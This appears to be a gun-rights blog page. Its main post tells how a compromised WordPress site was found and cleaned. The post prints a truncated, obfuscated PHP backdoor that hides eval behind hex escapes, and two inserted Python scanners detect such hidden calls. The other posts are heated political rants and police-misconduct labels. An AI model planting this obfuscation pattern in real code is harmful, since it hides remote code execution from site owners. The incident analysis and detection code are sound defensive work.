SSCC Honorable Mention: Delaware County

A longtime Delaware County sheriff’s deputy is facing assault and reckless endangerment charges in Lehigh County after allegedly opening fire on his own car as the woman he lent it to attempted to flee, authorities said.

Gregory Todd Price, 53, of the Drexel Hill section of Upper Darby, was arrested Tuesday by Allentown police and charged with one count of simple assault and three counts of recklessly endangering another person.

Remember though, the police are the only ones trained enough in the legal use of deadly force and the proper and safe handling of a firearm.

That man gets a pass to carry a firearm, even in places other people who are licensed can’t.  Didn’t stop him from being an idiot though now did it.

I should probably strike the Honorable Mention from this considering he will probably resign to save face.  Never mind the fact anyone working in the private sector would get the boot from their employer in an event such as this.

State Sponsored Criminal (HM): Gregory Todd Price

Because cops get a free pass to threaten, intimidate, and deploy deadly force without cause.

Zombies are Real and Infectious…


That is of course unless you supply a couple well placed rounds to the upper cranial cavity once you discover their plight.

Let me start at the beginning.  Over the past month I’ve been busy working on polishing the finishing edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to provide me the best probabilities for survival when the inevitable finally happens.

Last weekend I migrated bloggers Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities which I quickly resolved.  That done I set my sights on moving Weer’d.

I logged in, dumped the database, tar’d up the site.  The tar fails, odd, what do you mean you couldn’t read that file?  Didn’t think much of it, found the file, odd the permissions are 000.  This isn’t my site though and I’m not sure if there was something special done so I fix it.  In total I fix 8 files like this.  I move the site over, and get him set up on the new server.  It actually went even smoother than Linoge and didn’t require a weird step.

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not give me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT - script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT - script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

What!?  I promptly dump open that file and am greeted by the following:


* Applies custom filter.


* @since 0.71


* $text string to apply the filter

* @return string


function applyfilter($text=null) {


  if($text) @ob_start();

  if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,“\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73”); if(!function_exists(“O01100llO”)){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,‘od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl’,6274);}call_user_func(create_function(,“\x65\x76\x61l(\x4F01100llO());”));}}

  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}


Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  Promptly I shifted into Defcon 2, the good news was the IP in the log was Google crawling the site.  I promptly bump an email to Weer’d along with everyone else about this new Charlie Foxtrot.
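The sample above never spells out eval in plain text; the call only appears once PHP expands the \x escapes, so a plain search for "eval(" misses it. The following is an added example (not code from this post or from WordFence) that expands hex and octal escapes before looking for dynamic-execution calls; the sample strings and all function names are constructed for illustration.

```python
"""Added example: find PHP whose string literals hide calls behind escapes."""
import re
from collections import Counter
from pathlib import Path

# Escapes PHP expands in double-quoted strings: \xHH (hex) and \NNN (octal).
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")
# Calls that build or run code at runtime, as in the sample on this page.
DYNAMIC_CALL = re.compile(r"\b(eval|create_function|call_user_func)\s*\(", re.I)
# Four or more escapes back to back; ordinary code rarely spells text this way.
ESCAPE_RUN = re.compile(r"(?:\\x[0-9A-Fa-f]{2}|\\[0-7]{2,3}){4,}")

# Constructed, inert samples (not the payload from the page).
CLEAN_SAMPLE = r"""<?php
function apply_filter($text) { return trim($text); }
"""
SUSPECT_SAMPLE = r"""<?php
$f = create_function('$s', "\162\145\164\165\162\156\40\44\163\73");
call_user_func(create_function('', "\x65\x76\x61l(\x24payload);"));
"""


def decode_php_escapes(text: str) -> str:
    """Expand hex and octal escapes in one pass, as PHP would at parse time."""
    def expand(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        return chr(int(match.group(2), 8) & 0xFF)
    return ESCAPE.sub(expand, text)


def scan_php(source: str) -> list:
    """Return findings for one file's text; an empty list means nothing flagged."""
    visible = Counter(m.group(1).lower() for m in DYNAMIC_CALL.finditer(source))
    decoded = Counter(m.group(1).lower()
                      for m in DYNAMIC_CALL.finditer(decode_php_escapes(source)))
    # Calls that exist only after decoding were deliberately hidden.
    findings = [f"hidden-call:{name}" for name in sorted(decoded - visible)]
    findings += [f"dynamic-call:{name}" for name in sorted(visible)]
    longest = max((len(m.group(0)) for m in ESCAPE_RUN.finditer(source)), default=0)
    if longest:
        findings.append(f"escape-run:{longest}-chars")
    return findings


def scan_tree(root: str) -> dict:
    """Scan every *.php file under root; unreadable files are reported, not skipped."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        try:
            hits = scan_php(path.read_text(errors="replace"))
        except OSError as exc:
            hits = [f"unreadable:{exc.strerror}"]
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    print(scan_php(SUSPECT_SAMPLE))
```

A "dynamic-call" finding alone is only a reason to read the file, since legitimate plugins use these functions too; a "hidden-call" finding means a call was written so that it would not show up in a text search.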

I have no idea how severe this incident is; at this point I trust absolutely no one.  My first order of business is to close the problem that I now see.  I manually reinstall WordPress overwriting ALL the existing files on the server.  This promptly stops those trailing messages in my log.  Something new happens though.

Weer’d has WordFence security, fantastic plugin and I highly suggest it, and I run a scan, it says nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.


There’s the list in a little more file friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double checking from a shell and then reinstalling what I do actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  Overall there were both stock WordPress files that were compromised along with additional files that were added but made to look legitimate.
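The diff against a known-good site described above, written as an added example (not the author's commands and not part of WordFence): it hashes every file in the live tree against a clean copy and separates modified stock files, files that exist only on the live site, and files left at mode 000 like the eight that broke the tar. The directory layout, the ignore list and the file names in demo() are constructed assumptions.

```python
"""Added example: compare a live WordPress tree against a known-good copy."""
import hashlib
import tempfile
from pathlib import Path

# Paths that legitimately differ per site (assumption: standard WordPress layout).
SITE_SPECIFIC = ("wp-config.php", "wp-content/uploads/")


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def index_tree(root: Path) -> dict:
    """Map each regular file's path relative to root onto its full path."""
    return {p.relative_to(root).as_posix(): p
            for p in root.rglob("*") if p.is_file() and not p.is_symlink()}


def compare_to_baseline(site_root, clean_root) -> dict:
    site, clean = index_tree(Path(site_root)), index_tree(Path(clean_root))
    report = {"modified": [], "added": [], "mode_000": []}
    for rel, path in sorted(site.items()):
        if rel.startswith(SITE_SPECIFIC):
            continue
        if path.stat().st_mode & 0o777 == 0:
            # Cannot be hashed without changing it first; report it, do not chmod.
            report["mode_000"].append(rel)
        elif rel not in clean:
            report["added"].append(rel)
        elif sha256_file(path) != sha256_file(clean[rel]):
            report["modified"].append(rel)
    return report


def demo() -> dict:
    """Build two small constructed trees and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = Path(tmp, "clean"), Path(tmp, "site")
        stock = {"wp-includes/post-template.php": "<?php // stock\n",
                 "wp-includes/version.php": "<?php // stock version\n"}
        for root in (clean, site):
            for rel, body in stock.items():
                target = root / rel
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_text(body)
        # Constructed tampering: one edited stock file, one extra file, one 000 file.
        (site / "wp-includes/post-template.php").write_text("<?php // altered\n")
        (site / "wp-includes/class-wp-extra.php").write_text("<?php // extra\n")
        locked = site / "wp-includes/locked.php"
        locked.write_text("<?php\n")
        locked.chmod(0)
        (site / "wp-config.php").write_text("<?php // site-specific\n")
        return compare_to_baseline(site, clean)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Comparing content hashes does not depend on modification times, which anyone with write access to the files can reset.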

After a short while I had the site cleaned up on my server.  I will do a more thorough cleaning but that was the immediate action remedy for BF 30 in the am Sunday night.

I do however want to investigate the details of this.  I log in to the old server with Dreamhost and start looking around. I want to isolate the cause of the breach and determine if there are any other issues. Did this just suddenly go sideways on my box or was this a preexisting condition and to what depths did it go?  All the exploits are present, so that means it was prior to the move and wasn’t anything on my side and then I look at the root directory:


Do you see it?  Here’s the dump of what’s inside:


Now if you closely pay attention you can glean a few important facts from the above.  First, they had multiple exploits to get back in.  Second, they obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag) such as .bash_history not working correctly.  Lastly though we can note the date for the last edit October 5th, 2012.

There’s a reason that rang a bell with me.  From an article dated Oct 3, 2012

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as “itsoknoproblembro.” When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friend’s place and inadvertently moved him.  That’s OK though, upon finding him I filled him full of 00 Buck Shot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire here when I get a bit more free time.

My actions though are leaps and bounds beyond what Dreamhost is doing and remember they’re the ones who actually suffered a data breach and have a server where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
More information on this topic is available at the following URL under the “CGI Hack” and “Cleaning Up” sections:

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in Root access and Dreamhost’s response is, “Here we’ll help you remove the malicious code from your site.”  Uh, already done that sparky but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically closing the front door and locking it after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites within other accounts?

The real reason we were informing you is because you have a breach which placed everyone who has data on that server in danger.  I’m root, I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you boy genius.

Yes I understand you want to look good and not like a complete idiot in front of your customers.  Know what though “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious and at least an acknowledgement of, “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why it’s happening.  It sucks, every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved and today’s was a bit of an odd duck that only affected one site but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well I’m sorry but we have heavy signs of enemy action and that is no coincidence.  That server is most likely still compromised at the root level and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface area is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks, digital zombies exist, they are contagious if you’re not careful, and are best dealt with a serious dose of heavy metal poisoning followed by a tactical nuke to the general vicinity.  Be very careful too, sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

SSCC: Rio Hondo

A federal judge in Brownsville sentenced 31-year-old Armando Duenez (DWHEN’-ehz). He pleaded guilty in January to conspiracy to export firearms and failure to appear.

Investigators say Duenez was a Rio Hondo police officer at the time of the scheme to export rifles from the U.S. to Mexico.

Maybe he was the pilot program for Fast and Furious?

State Sponsored Criminal: Armando Duenez

Because he should have gone to work for the ATF instead.

h/t Bob S.

Denial, the first stage of grief…

So the wife brought home an article and it is a reminder our fight is not over, but mainly because of their attachment to their false reality.

After struggling to sway both state and federal lawmakers, proponents of expanding background checks for gun sales are now exploring whether they will have more success by taking the issue directly to voters.

While advocates generally prefer that new gun laws be passed through the legislative process, especially at the national level, they are also concerned about how much sway the National Rifle Association has with lawmakers. Washington Rep. Jamie Pedersen, a Democrat who had sponsored unsuccessful legislation on background checks at the state level, said a winning ballot initiative would make a statement with broad implications.

We shut down the Federal attempt at creating new gun control.  Even an amendment that had some decent support from big names on our side failed.  Let’s take a quick look at what new gun laws have been passed even at the state level.

New York:

They railroaded their legislation through in the middle of the night so that the people, not the NRA, could fight it.  The legislation was so full of problems that there was not even a police exemption.


This was railroaded in much the same as New York.  They declared it a legislative emergency to prevent public debate and discussion of the topic.  Notice a pattern here? 

Maryland and Colorado:

Both allowed but limited public debate.  Those supporting gun-control were by far outnumbered but due to time constraints, some people had to wait multiple days to testify.

Where am I going?

I could continue but do you notice a pattern in this?  The fact is we outnumber you. You are in fact the minority and doubly you are a puritan and hate liberty.  You are living in a world of denial.  The NRA has passed the 5.5 million member mark.  At the Boomershoot dinner this year we met a nice old lady who doesn’t even own a firearm that just recently joined the NRA.  Why?  Because she doesn’t support the goals you’re attempting to achieve.

Hell, the NRA Annual Meeting had an attendance above 60,000.  Tell me, how big was your last Gun Grabber Annual Meeting?  Tell me, how many paying members have come into the rolls of the Brady Campaign and CSGV over the past 5 months?  Wikipedia lists it at under 28,000.  We had more than twice the people pay to attend the annual meeting in Texas than you have in your entire membership.  That’s also in a weak economy where many don’t have excess cash to spend.

News flash to you Mr. Baker I am the NRA and I vote.  There are 5.5 million of us who have joined the NRA to explicitly support our rights, and we all vote.  There are millions more who aren’t members of the NRA but the Right to Keep and Bear Arms is a central item to their voting pattern and guess what, they vote too.

I want you to understand something Mr. Baker.  Behind me there are thousands of other gun owners who will fight until the bitter end.  You call me a bitter clinger so by god I might as well just accept the suck.  We will not stop until we sweep you and your hateful compatriots into the dust bin of history where you will sit next to the likes of the KKK.

All your side has is emotion and heart strings.  We have facts, reason, and the support of the majority.  The first step in the grieving process is denial.  You refuse to accept the truth Mr. Baker despite all the facts to the contrary.  You insist on conspiracies and a lack of public support despite all the evidence showing this isn’t true.  You insist that gun owners, as well as those who support their rights, are in the minority without any evidence to prove it.  At the mass convention of your “arch nemesis” you could only route 40 people to protest your enemy.

We routed 2/3 that number on two days notice in a considerably less populated area of Idaho.  And that was to protest a Republican.  Where’s your numbers to support your initiatives for the ballot box?

A Short Story…

Terry from the Boomershoot staff emailed this to me and honestly it’s worth the read.

Once upon a time there was a street fair. It had striped awnings and bright colors and from far and near, farmers came with wagons full of produce to sell at the street fair. The produce was plentiful and cheap and the crowds it drew were huge which created all sorts of concerns for the government.

So the government created a Ministry of Street Fairs which it funded by taxing the produce sold at the fair. At first the Ministry brought some order to the street fair, but it would periodically launch new “street fair initiatives” to justify another expansion and pay for them by raising taxes on the produce.

Just keep reading.  For many of us the results were obvious, others however will continue to insist the story is wrong and their false view of the world is real.

I wanted to snap something as the quote of the day but honestly, it only works as a story.  Go, read, spread it far and wide.

SSCC: Lexington

A man has filed a federal lawsuit against a Lexington police officer alleging that the officer forced his way into the man’s home without a warrant and charged him with several offenses that were later dismissed.

The officer assaulted the home owner as well as forced entry without cause.

State Sponsored Criminal: Ronald Kornrumpf

Because warrants, probable cause, and the use of force continuum apply to everyone but law enforcement.

I’m sure somehow we’ll be blamed for this…

The federal Bureau of Alcohol, Tobacco, Firearms and Explosives, the U.S. Forest Service, and the Carbon County Sheriff’s Office are asking for help from the public in gathering information about the theft of approximately 559 pounds of high explosives from a USFS explosives bunker located near Red Lodge.

We’re not talking just blasting agent either.

Officials say that various emulsion-type explosives, explosive cast boosters and detonating cord were taken from the facility.

How serious is the ATF taking the theft?  They’re offering a $5,000 reward.  Their warmth and sincerity given the theft occurred with forced entry makes me feel all sorts of warm and fuzzy inside.  Doubly so given the propensity of the government, not to mention the BATFE, is more than willing to throw civil rights and liberties to the wind.

[Sarcasm] But remember, it’s me and you that they need to restrict.  The government could never fail us. [/Sarcasm]

Quote of the Day – Sean Sorrentino (5/2/2013)

No, the only reason you give a shit at all about this poor little girl from a gun owning family in a flyover state is because you think you can use her death to advance your political agenda. At some point, when you were down on your knees scooping her blood up in your hands so you could grease the skids for more gun control, you should have seriously questioned your humanity.

Sean Sorrentino – Stop pretending that you care! (Language Warning)
May 2nd, 2013

[Honestly I couldn’t put it better myself and it’s worth going over and reading the whole thing.  They are nothing more than vultures praying for preying upon the tragedies of others. -B]